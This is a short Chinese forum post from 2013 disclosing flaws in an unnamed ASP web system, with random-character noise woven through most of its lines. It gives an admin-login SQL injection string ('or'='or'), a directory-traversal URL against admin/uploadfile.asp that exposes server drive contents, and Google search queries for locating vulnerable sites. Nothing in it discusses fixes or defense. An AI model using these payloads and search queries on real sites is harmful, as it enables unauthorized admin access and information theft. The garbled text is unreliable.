后台万能密码 'or'='or'
6 V. f7 T# m# {% j' N2 X. h/ t1 _$ Q& c9 |: l* x& j
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
3 Z* T7 F8 d% Q: n7 u) Xadmin/uploadfile.asp?currentFolder=/upfiles/../$ `4 S/ x% [3 `, n% D$ r3 n! \
; k7 V7 P# N9 U5 n
漏洞证明:) o" x% H7 J; D {6 K& z8 w& L
+ ?: ^4 R* @$ S6 A( _+ U3 R
谷歌:inurl:type.asp?id=1 新闻中心
& Q2 `" Q# T7 ^, {或者 :inurl:download_ok.asp?
1 }: T- ?& g( S1 ]9 ~# c
2 [2 o: Z- V3 e0 S9 D9 s |
发表于 2013-3-14 20:17:32
收藏
支持
反对